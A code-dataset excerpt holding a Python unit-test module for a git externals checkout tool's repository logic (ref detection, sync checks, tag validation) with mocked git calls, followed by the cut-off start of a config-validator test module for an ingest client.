        if agent_id == 0 or agent_id == 2:
            return arr
        else:
            return [arr[1], arr[0], arr[2]]
| 38.571429
| 165
| 0.572428
|
4a0a334bb1b88b8c4baafdd5400a1d1f41635151
| 31,322
|
py
|
Python
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 1
|
2021-08-30T03:11:41.000Z
|
2021-08-30T03:11:41.000Z
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 2
|
2021-09-18T00:18:10.000Z
|
2021-10-18T15:10:07.000Z
|
manage_externals/test/test_unit_repository_git.py
|
guoqing-noaa/ufs-rtma-app
|
04106ae1899118f66c5b045092ebc0d736c0cbf6
|
[
"CC0-1.0"
] | 2
|
2020-06-15T17:44:13.000Z
|
2020-06-15T17:48:01.000Z
|
#!/usr/bin/env python
"""Unit test driver for checkout_externals
Note: this script assume the path to the checkout_externals.py module is
already in the python path.
"""
# pylint: disable=too-many-lines,protected-access
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import shutil
import unittest
from manic.repository_git import GitRepository
from manic.externals_status import ExternalStatus
from manic.externals_description import ExternalsDescription
from manic.externals_description import ExternalsDescriptionDict
from manic.global_constants import EMPTY_STR
# NOTE(bja, 2017-11) order is important here. origin should be a
# subset of other to trap errors on processing remotes!
# Canned `git remote -v` output consumed by the git-call mocks in the
# test classes below.
GIT_REMOTE_OUTPUT_ORIGIN_UPSTREAM = '''
upstream /path/to/other/repo (fetch)
upstream /path/to/other/repo (push)
other /path/to/local/repo2 (fetch)
other /path/to/local/repo2 (push)
origin /path/to/local/repo (fetch)
origin /path/to/local/repo (push)
'''
class TestGitRepositoryCurrentRef(unittest.TestCase):
    """test the current_ref command on a git repository
    """

    def setUp(self):
        # Build a minimal externals description pointing at a fake repo,
        # then extract the GitRepository under test from it.
        self._name = 'component'
        rdata = {ExternalsDescription.PROTOCOL: 'git',
                 ExternalsDescription.REPO_URL:
                 '/path/to/local/repo',
                 ExternalsDescription.TAG:
                 'tag1',
                 }

        data = {self._name:
                {
                    ExternalsDescription.REQUIRED: False,
                    ExternalsDescription.PATH: 'junk',
                    ExternalsDescription.EXTERNALS: EMPTY_STR,
                    ExternalsDescription.REPO: rdata,
                },
                }

        model = ExternalsDescriptionDict(data)
        repo = model[self._name][ExternalsDescription.REPO]
        self._repo = GitRepository('test', repo)

    #
    # mock methods replacing git system calls
    #
    @staticmethod
    def _git_current_branch(branch_found, branch_name):
        """Return a function that takes the place of
        repo._git_current_branch, which returns the given output."""
        def my_git_current_branch():
            """mock function that can take the place of repo._git_current_branch"""
            return branch_found, branch_name
        return my_git_current_branch

    @staticmethod
    def _git_current_tag(tag_found, tag_name):
        """Return a function that takes the place of
        repo._git_current_tag, which returns the given output."""
        def my_git_current_tag():
            """mock function that can take the place of repo._git_current_tag"""
            return tag_found, tag_name
        return my_git_current_tag

    @staticmethod
    def _git_current_hash(hash_found, hash_name):
        """Return a function that takes the place of
        repo._git_current_hash, which returns the given output."""
        def my_git_current_hash():
            """mock function that can take the place of repo._git_current_hash"""
            return hash_found, hash_name
        return my_git_current_hash

    # ------------------------------------------------------------------------
    # Begin tests
    # ------------------------------------------------------------------------
    def test_ref_branch(self):
        """Test that we correctly identify we are on a branch
        """
        self._repo._git_current_branch = self._git_current_branch(
            True, 'feature3')
        self._repo._git_current_tag = self._git_current_tag(True, 'foo_tag')
        self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
        expected = 'feature3'
        result = self._repo._current_ref()
        self.assertEqual(result, expected)

    def test_ref_detached_tag(self):
        """Test that we correctly identify that the ref is detached at a tag
        """
        self._repo._git_current_branch = self._git_current_branch(False, '')
        self._repo._git_current_tag = self._git_current_tag(True, 'foo_tag')
        self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
        expected = 'foo_tag'
        result = self._repo._current_ref()
        self.assertEqual(result, expected)

    def test_ref_detached_hash(self):
        """Test that we can identify ref is detached at a hash
        """
        self._repo._git_current_branch = self._git_current_branch(False, '')
        self._repo._git_current_tag = self._git_current_tag(False, '')
        self._repo._git_current_hash = self._git_current_hash(True, 'abc123')
        expected = 'abc123'
        result = self._repo._current_ref()
        self.assertEqual(result, expected)

    def test_ref_none(self):
        """Test that we correctly identify that we're not in a git repo.
        """
        self._repo._git_current_branch = self._git_current_branch(False, '')
        self._repo._git_current_tag = self._git_current_tag(False, '')
        self._repo._git_current_hash = self._git_current_hash(False, '')
        result = self._repo._current_ref()
        self.assertEqual(result, EMPTY_STR)
class TestGitRepositoryCheckSync(unittest.TestCase):
    """Test whether the GitRepository _check_sync_logic functionality is
    correct.
    Note: there are a lot of combinations of state:
    - external description - tag, branch
    - working copy
      - doesn't exist (not checked out)
      - exists, no git info - incorrect protocol, e.g. svn, or tarball?
      - exists, git info
        - as expected:
        - different from expected:
           - detached tag,
           - detached hash,
           - detached branch (compare remote and branch),
           - tracking branch (compare remote and branch),
             - same remote
             - different remote
           - untracked branch
    Test list:
      - doesn't exist
      - exists no git info
      - num_external * (working copy expected + num_working copy different)
      - total tests = 16
    """
    # NOTE(bja, 2017-11) pylint complains about long method names, but
    # it is hard to differentiate tests without making them more
    # cryptic. Also complains about too many public methods, but it
    # doesn't really make sense to break this up.
    # pylint: disable=invalid-name,too-many-public-methods
    # Throwaway on-disk directory that stands in for a checked-out
    # working copy; created in setUp and removed in tearDown.
    TMP_FAKE_DIR = 'fake'
    TMP_FAKE_GIT_DIR = os.path.join(TMP_FAKE_DIR, '.git')
    def setUp(self):
        """Setup reusable git repository object
        """
        self._name = 'component'
        rdata = {ExternalsDescription.PROTOCOL: 'git',
                 ExternalsDescription.REPO_URL:
                 '/path/to/local/repo',
                 ExternalsDescription.TAG: 'tag1',
                 }
        data = {self._name:
                {
                 ExternalsDescription.REQUIRED: False,
                 ExternalsDescription.PATH: self.TMP_FAKE_DIR,
                 ExternalsDescription.EXTERNALS: EMPTY_STR,
                 ExternalsDescription.REPO: rdata,
                 },
                }
        model = ExternalsDescriptionDict(data)
        repo = model[self._name][ExternalsDescription.REPO]
        self._repo = GitRepository('test', repo)
        # The unit tests here don't care about the result of
        # _current_ref, but we replace it here so that we don't need to
        # worry about calling a possibly slow and possibly
        # error-producing command (since _current_ref calls various git
        # functions):
        self._repo._current_ref = self._current_ref_empty
        self._create_tmp_git_dir()
    def tearDown(self):
        """Cleanup tmp stuff on the file system
        """
        self._remove_tmp_git_dir()
    def _create_tmp_git_dir(self):
        """Create a temporary fake git directory for testing purposes.
        """
        if not os.path.exists(self.TMP_FAKE_GIT_DIR):
            os.makedirs(self.TMP_FAKE_GIT_DIR)
    def _remove_tmp_git_dir(self):
        """Remove the temporary fake git directory
        """
        if os.path.exists(self.TMP_FAKE_DIR):
            shutil.rmtree(self.TMP_FAKE_DIR)
    #
    # mock methods replacing git system calls
    #
    @staticmethod
    def _current_ref_empty():
        """Return an empty string.
        """
        return EMPTY_STR
    @staticmethod
    def _git_remote_origin_upstream():
        """Return an info string that is a checkout hash
        """
        return GIT_REMOTE_OUTPUT_ORIGIN_UPSTREAM
    @staticmethod
    def _git_remote_none():
        """Return an info string that is a checkout hash
        """
        return EMPTY_STR
    @staticmethod
    def _git_current_hash(myhash):
        """Return a function that takes the place of repo._git_current_hash,
        which returns the given hash
        """
        def my_git_current_hash():
            """mock function that can take the place of repo._git_current_hash"""
            # (status, hash) pair; status 0 indicates success.
            return 0, myhash
        return my_git_current_hash
    def _git_revparse_commit(self, expected_ref, mystatus, myhash):
        """Return a function that takes the place of
        repo._git_revparse_commit, which returns a tuple:
        (mystatus, myhash).
        Expects the passed-in ref to equal expected_ref
        status = 0 implies success, non-zero implies failure
        """
        def my_git_revparse_commit(ref):
            """mock function that can take the place of repo._git_revparse_commit"""
            # The embedded assertion verifies that the code under test
            # resolved the expected reference (e.g. remote/branch name).
            self.assertEqual(expected_ref, ref)
            return mystatus, myhash
        return my_git_revparse_commit
    # ----------------------------------------------------------------
    #
    # Tests where working copy doesn't exist or is invalid
    #
    # ----------------------------------------------------------------
    def test_sync_dir_not_exist(self):
        """Test that a directory that doesn't exist returns an error status
        Note: the Repository classes should be prevented from ever
        working on an empty directory by the _Source object.
        """
        stat = ExternalStatus()
        self._repo._check_sync(stat, 'invalid_directory_name')
        self.assertEqual(stat.sync_state, ExternalStatus.STATUS_ERROR)
        # check_dir should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_dir_exist_no_git_info(self):
        """Test that a non-existent git repo returns an unknown status
        """
        stat = ExternalStatus()
        # Now we over-ride the _git_remote_verbose method on the repo to return
        # a known value without requiring access to git.
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = 'tag1'
        self._repo._git_current_hash = self._git_current_hash('')
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'tag1', 1, '')
        self._repo._check_sync(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.UNKNOWN)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    # ------------------------------------------------------------------------
    #
    # Tests where version in configuration file is not a valid reference
    #
    # ------------------------------------------------------------------------
    def test_sync_invalid_reference(self):
        """Test that an invalid reference returns out-of-sync
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = 'tag1'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        # revparse status 1 -> the configured tag cannot be resolved
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'tag1', 1, '')
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    # ----------------------------------------------------------------
    #
    # Tests where external description specifies a tag
    #
    # ----------------------------------------------------------------
    def test_sync_tag_on_same_hash(self):
        """Test expect tag on same hash --> status ok
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = 'tag1'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'tag1', 0, 'abc123')
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_tag_on_different_hash(self):
        """Test expect tag on a different hash --> status modified
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = 'tag1'
        # working copy is at def456 but the tag resolves to abc123
        self._repo._git_current_hash = self._git_current_hash('def456')
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'tag1', 0, 'abc123')
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    # ----------------------------------------------------------------
    #
    # Tests where external description specifies a hash
    #
    # ----------------------------------------------------------------
    def test_sync_hash_on_same_hash(self):
        """Test expect hash on same hash --> status ok
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = ''
        self._repo._hash = 'abc'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'abc', 0, 'abc123')
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_hash_on_different_hash(self):
        """Test expect hash on a different hash --> status modified
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._tag = ''
        self._repo._hash = 'abc'
        self._repo._git_current_hash = self._git_current_hash('def456')
        self._repo._git_revparse_commit = self._git_revparse_commit(
            'abc', 0, 'abc123')
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    # ----------------------------------------------------------------
    #
    # Tests where external description specifies a branch
    #
    # ----------------------------------------------------------------
    def test_sync_branch_on_same_hash(self):
        """Test expect branch on same hash --> status ok
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature-2'
        self._repo._tag = ''
        self._repo._git_current_hash = self._git_current_hash('abc123')
        # branch is resolved against the matching remote name 'origin'
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('origin/feature-2', 0, 'abc123'))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_branch_on_diff_hash(self):
        """Test expect branch on diff hash --> status modified
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature-2'
        self._repo._tag = ''
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('origin/feature-2', 0, 'def456'))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_branch_diff_remote(self):
        """Test _determine_remote_name with a different remote
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature-2'
        self._repo._tag = ''
        # URL matches the 'upstream' remote in the mocked remote listing
        self._repo._url = '/path/to/other/repo'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('upstream/feature-2', 0, 'def456'))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        # The test passes if _git_revparse_commit is called with the
        # expected argument
    def test_sync_branch_diff_remote2(self):
        """Test _determine_remote_name with a different remote
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature-2'
        self._repo._tag = ''
        self._repo._url = '/path/to/local/repo2'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('other/feature-2', 0, 'def789'))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        # The test passes if _git_revparse_commit is called with the
        # expected argument
    def test_sync_branch_on_unknown_remote(self):
        """Test expect branch, but remote is unknown --> status modified
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature-2'
        self._repo._tag = ''
        self._repo._url = '/path/to/unknown/repo'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('unknown_remote/feature-2', 1, ''))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.MODEL_MODIFIED)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
    def test_sync_branch_on_untracked_local(self):
        """Test expect branch, on untracked branch in local repo --> status ok
        Setting the externals description to '.' indicates that the
        user only wants to consider the current local repo state
        without fetching from remotes. This is required to preserve
        the current branch of a repository during an update.
        """
        stat = ExternalStatus()
        self._repo._git_remote_verbose = self._git_remote_origin_upstream
        self._repo._branch = 'feature3'
        self._repo._tag = ''
        self._repo._url = '.'
        self._repo._git_current_hash = self._git_current_hash('abc123')
        # note: bare branch name, no remote prefix, for the local-only case
        self._repo._git_revparse_commit = (
            self._git_revparse_commit('feature3', 0, 'abc123'))
        self._repo._check_sync_logic(stat, self.TMP_FAKE_DIR)
        self.assertEqual(stat.sync_state, ExternalStatus.STATUS_OK)
        # check_sync should only modify the sync_state, not clean_state
        self.assertEqual(stat.clean_state, ExternalStatus.DEFAULT)
class TestGitStatusPorcelain(unittest.TestCase):
    """Tests for parsing the output of ``git status --porcelain=v1 -z``."""
    # pylint: disable=C0103
    GIT_STATUS_PORCELAIN_V1_ALL = (
        r' D INSTALL\0MM Makefile\0M README.md\0R cmakelists.txt\0'
        r'CMakeLists.txt\0D commit-message-template.txt\0A stuff.txt\0'
        r'?? junk.txt')
    GIT_STATUS_PORCELAIN_CLEAN = r''
    def test_porcelain_status_dirty(self):
        """Output listing modified/added/deleted files must be reported
        as dirty.
        """
        self.assertTrue(
            GitRepository._status_v1z_is_dirty(
                self.GIT_STATUS_PORCELAIN_V1_ALL))
    def test_porcelain_status_clean(self):
        """Empty porcelain output must be reported as clean."""
        self.assertFalse(
            GitRepository._status_v1z_is_dirty(
                self.GIT_STATUS_PORCELAIN_CLEAN))
class TestGitCreateRemoteName(unittest.TestCase):
    """Test the create_remote_name method on the GitRepository class
    """
    def setUp(self):
        """Common infrastructure for testing _create_remote_name.

        Builds a reusable GitRepository; each test overrides
        ``self._repo._url`` before calling ``_create_remote_name``.
        """
        self._rdata = {ExternalsDescription.PROTOCOL: 'git',
                       ExternalsDescription.REPO_URL:
                       'empty',
                       ExternalsDescription.TAG:
                       'very_useful_tag',
                       ExternalsDescription.BRANCH: EMPTY_STR,
                       ExternalsDescription.HASH: EMPTY_STR,
                       ExternalsDescription.SPARSE: EMPTY_STR, }
        self._repo = GitRepository('test', self._rdata)
    def test_remote_git_proto(self):
        """Test remote name generation from a git-protocol URL
        """
        self._repo._url = 'git@git.github.com:very_nice_org/useful_repo'
        remote_name = self._repo._create_remote_name()
        self.assertEqual(remote_name, 'very_nice_org_useful_repo')
    def test_remote_https_proto(self):
        """Test remote name generation from an https URL
        """
        self._repo._url = 'https://www.github.com/very_nice_org/useful_repo'
        remote_name = self._repo._create_remote_name()
        self.assertEqual(remote_name, 'very_nice_org_useful_repo')
    def test_remote_local_abs(self):
        """Test remote name generation from an absolute local path
        """
        self._repo._url = '/path/to/local/repositories/useful_repo'
        remote_name = self._repo._create_remote_name()
        self.assertEqual(remote_name, 'repositories_useful_repo')
    def test_remote_local_rel(self):
        """Test remote name generation from a relative local path that
        contains an environment variable
        """
        os.environ['TEST_VAR'] = '/my/path/to/repos'
        try:
            self._repo._url = '${TEST_VAR}/../../useful_repo'
            remote_name = self._repo._create_remote_name()
            self.assertEqual(remote_name, 'path_useful_repo')
        finally:
            # Always restore the environment, even when the assertion
            # fails, so other tests are not polluted by TEST_VAR.
            del os.environ['TEST_VAR']
class TestVerifyTag(unittest.TestCase):
    """Test logic verifying that a tag exists and is unique
    """
    def setUp(self):
        """Setup reusable git repository object
        """
        self._name = 'component'
        rdata = {ExternalsDescription.PROTOCOL: 'git',
                 ExternalsDescription.REPO_URL:
                 '/path/to/local/repo',
                 ExternalsDescription.TAG: 'tag1',
                 }
        data = {self._name:
                {
                 ExternalsDescription.REQUIRED: False,
                 ExternalsDescription.PATH: 'tmp',
                 ExternalsDescription.EXTERNALS: EMPTY_STR,
                 ExternalsDescription.REPO: rdata,
                 },
                }
        model = ExternalsDescriptionDict(data)
        repo = model[self._name][ExternalsDescription.REPO]
        self._repo = GitRepository('test', repo)
    @staticmethod
    def _shell_true(url, remote=None):
        # mock git command returning success (exit status 0)
        _ = url
        _ = remote
        return 0
    @staticmethod
    def _shell_false(url, remote=None):
        # mock git command returning failure (non-zero exit status)
        _ = url
        _ = remote
        return 1
    @staticmethod
    def _mock_function_true(ref):
        # NOTE(review): returns the *function object* TestValidRef._shell_true
        # as the status element, not a numeric exit code, and references the
        # later TestValidRef class rather than this one — presumably relies
        # on truthiness of the tuple's first element; verify intent.
        _ = ref
        return (TestValidRef._shell_true, '97ebc0e0deadc0de')
    @staticmethod
    def _mock_function_false(ref):
        # NOTE(review): same pattern as _mock_function_true — function object
        # used where a status code appears intended; confirm against
        # GitRepository._git_revparse_commit's expected (status, hash) tuple.
        _ = ref
        return (TestValidRef._shell_false, '97ebc0e0deadc0de')
    def test_tag_not_tag_branch_commit(self):
        """Verify a non-tag returns false
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_false
        self._repo._tag = 'something'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertFalse(received)
    def test_tag_not_tag(self):
        """Verify a non-tag, untracked remote returns false
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_true
        self._repo._git_lsremote_branch = self._shell_true
        self._repo._git_revparse_commit = self._mock_function_false
        self._repo._tag = 'tag1'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertFalse(received)
    def test_tag_indeterminant(self):
        """Verify an indeterminant tag/branch returns false
        """
        # both tag and branch lookups succeed -> ambiguous reference
        self._repo._git_showref_tag = self._shell_true
        self._repo._git_showref_branch = self._shell_true
        self._repo._git_lsremote_branch = self._shell_true
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = 'something'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertFalse(received)
    def test_tag_is_unique(self):
        """Verify a unique tag match returns true
        """
        self._repo._git_showref_tag = self._shell_true
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = 'tag1'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertTrue(received)
    def test_tag_is_not_hash(self):
        """Verify a commit hash is not classified as a tag
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = '97ebc0e0'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertFalse(received)
    def test_hash_is_commit(self):
        """Verify a hash that resolves to a commit is not treated as a tag.

        NOTE(review): this test body is identical to test_tag_is_not_hash —
        it may have been intended to exercise a different code path; confirm.
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = '97ebc0e0'
        remote_name = 'origin'
        received, _ = self._repo._is_unique_tag(self._repo._tag, remote_name)
        self.assertFalse(received)
class TestValidRef(unittest.TestCase):
    """Test logic verifying that a reference is a valid tag, branch or sha1
    """
    def setUp(self):
        """Setup reusable git repository object
        """
        self._name = 'component'
        rdata = {ExternalsDescription.PROTOCOL: 'git',
                 ExternalsDescription.REPO_URL:
                 '/path/to/local/repo',
                 ExternalsDescription.TAG: 'tag1',
                 }
        data = {self._name:
                {
                 ExternalsDescription.REQUIRED: False,
                 ExternalsDescription.PATH: 'tmp',
                 ExternalsDescription.EXTERNALS: EMPTY_STR,
                 ExternalsDescription.REPO: rdata,
                 },
                }
        model = ExternalsDescriptionDict(data)
        repo = model[self._name][ExternalsDescription.REPO]
        self._repo = GitRepository('test', repo)
    @staticmethod
    def _shell_true(url, remote=None):
        # mock git command returning success (exit status 0)
        _ = url
        _ = remote
        return 0
    @staticmethod
    def _shell_false(url, remote=None):
        # mock git command returning failure (non-zero exit status)
        _ = url
        _ = remote
        return 1
    @staticmethod
    def _mock_function_false(ref):
        # NOTE(review): the status element is the _shell_false *function
        # object*, not a numeric code — presumably only its truthiness is
        # checked by the caller; verify against _git_revparse_commit's
        # expected (status, hash) contract.
        _ = ref
        return (TestValidRef._shell_false, '')
    @staticmethod
    def _mock_function_true(ref):
        # NOTE(review): same function-object-as-status pattern as above.
        _ = ref
        return (TestValidRef._shell_true, '')
    def test_valid_ref_is_invalid(self):
        """Verify an invalid reference raises an exception
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_false
        self._repo._tag = 'invalid_ref'
        with self.assertRaises(RuntimeError):
            self._repo._check_for_valid_ref(self._repo._tag)
    def test_valid_tag(self):
        """Verify a valid tag returns true
        """
        self._repo._git_showref_tag = self._shell_true
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = 'tag1'
        received = self._repo._check_for_valid_ref(self._repo._tag)
        self.assertTrue(received)
    def test_valid_branch(self):
        """Verify a valid branch returns true
        """
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_true
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = self._mock_function_true
        self._repo._tag = 'tag1'
        received = self._repo._check_for_valid_ref(self._repo._tag)
        self.assertTrue(received)
    def test_valid_hash(self):
        """Verify a valid hash returns true
        """
        def _mock_revparse_commit(ref):
            # unlike the class-level mocks, this one returns a proper
            # (status, hash) tuple with a numeric status code
            _ = ref
            return (0, '56cc0b539426eb26810af9e')
        self._repo._git_showref_tag = self._shell_false
        self._repo._git_showref_branch = self._shell_false
        self._repo._git_lsremote_branch = self._shell_false
        self._repo._git_revparse_commit = _mock_revparse_commit
        self._repo._hash = '56cc0b5394'
        received = self._repo._check_for_valid_ref(self._repo._hash)
        self.assertTrue(received)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 38.716934
| 84
| 0.640189
|
4a0a33fe78d2157d100cfcfe208d9b876c949042
| 6,841
|
py
|
Python
|
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
ingestclient/test/test_boss_validator_v02.py
|
lrodri29/ingest-client
|
548e1891990a70c23f2534eefbdbda35014edab1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from ingestclient.core.validator import Validator, BossValidatorV02
from ingestclient.core.backend import Backend, BossBackend
from ingestclient.core.config import Configuration, ConfigFileError
import os
import unittest
import json
from pkg_resources import resource_filename
import sys
class TestValidateConfig(unittest.TestCase):
# This was created mainly to support python 2.7 as well
def __init__(self, *args, **kwargs):
#First, Init the base class
super(TestValidateConfig, self).__init__(*args, **kwargs)
#Then account for python 2.7 difference in the function call
if sys.version_info < (3, 3):
#Back in python 2, the func was called "assertRegexpMatches".
# So to make current (py3) life easy, let's just equate the py2 version to our current impl
self.assertRegex = self.assertRegexpMatches
def get_skeleton_config(self):
"""
Returns a partial config that can be adjusted for different tests.
Returns:
(dict)
"""
return {
"schema": {
"name": "boss-v0.2-schema",
"validator": "BossValidatorV02"
},
"client": {
"backend": {
"name": "boss",
"class": "BossBackend",
"host": "api.theboss.io",
"protocol": "https"
},
"path_processor": {
"class":
"ingestclient.plugins.cloudvolume.CloudVolumePathProcessor",
"params": {}
}
#"tile_processor": {}
#"chunk_processor": {}
},
"database": {
"collection": "my_col_1",
"experiment": "my_exp_1",
"channel": "my_ch_1"
},
"ingest_job": {
# "ingest_type": "tile|volumetric",
"resolution": 0,
"extent": {
"x": [0, 8192],
"y": [0, 8192],
"z": [0, 500],
"t": [0, 1]
}
}
}
def test_valid_config(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_file = os.path.join(
resource_filename("ingestclient", "test/data"),
"boss-v0.2-test.json")
with open(config_file, 'rt') as example_file:
config_data = json.load(example_file)
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(0, len(msgs['error']))
def test_no_chunk_processor(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'volumetric'
config_data['ingest_job']['chunk_size'] = {
'x': 1024,
'y': 1024,
'z': 64
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*chunk_processor.*')
def test_no_chunk_size(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
